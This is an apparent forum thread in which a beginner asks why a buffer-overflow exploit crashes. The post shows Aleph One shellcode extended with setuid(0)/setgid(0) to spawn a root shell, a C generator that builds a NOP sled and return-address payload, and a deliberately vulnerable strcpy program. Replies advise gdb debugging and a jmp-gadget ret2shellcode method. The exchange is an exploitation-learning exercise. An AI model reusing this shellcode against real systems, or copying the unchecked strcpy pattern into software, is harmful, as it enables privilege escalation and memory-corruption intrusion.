Buffer Overflow Exploitation - Get a Segmentation Fault (core dumped)

exploitation
linux

(Febriyanto Nugroho) #1

Hello, newbie here I want to be ask :blush:

I tried to exploiting buffer overflow. In the exploit code I use the Aleph-One shellcode.

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"

Exploitation is normal, but I modified a little shellcode In order to execute setuid(0) and setgid(0).

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0)
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0)
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"

When in execution, I get the message Illegal Instruction (core dumped).

#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

char *prog = "./bof4";

char shellcode[] = 
//"\xeb\x0appssssffff"
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main (int argc, char **argv) {
char buff[111];
int i, j;
int addr;

if (argc > 1)
        sscanf(*(argv+1), "%x", &addr);
else
        exit(0);
for (i = 0; i < 35; i++) {
        *(buff+i) = 0x90;
}
for (j = 0; j < 45; j++, i++) {
        *(buff+i) = *(shellcode+j);
}
for (; i + 4 < 110; i += 4) {
        memcpy(buff+i, &addr, 4);
}
buff[108] = 0;
fwrite(buff, strlen(buff), 1, stdout);
}

bof4.c

#include <string.h>
#include <stdio.h>

int main (int argc, char **argv) { 
char bof[80];
if (argc > 1) {
	strcpy(bof, argv[1]);
	printf("You said '%s'\n", bof);
}
return(0);
}

Then I modify it back by changing the length value of the shellcode, its value is 61 bytes

for (j = 0; j < 61; j++, i++) {
        *(buff+i) = *(shellcode+j);
}

I get a Segmentation Fault (core dumped)

So, how to solve the problem?

Sorry for my bad english :joy:

Thank you !


#2

Whoops, never mind. I’m just bad at Linux.


#3

If you want to know why this happens and learn from it so it never happens again, fire up gdb. Obviously your shellcode is your issue. Go all the way up to the point where it returns and then look at the instructions step by step.

Once you figure out what’s up, let others know what was the issue so the newbies can learn from it and then close the topic.

Edit:

Make sure the stack is indeed executable. Also, returning to the buffer isn’t the only way to ret2shellcode. There’s a much more hybrid and cleaner solution, provided the right gadget. Write your shellcode AFTER the return address and find the right gadget to return to it (hint: jmp).


#4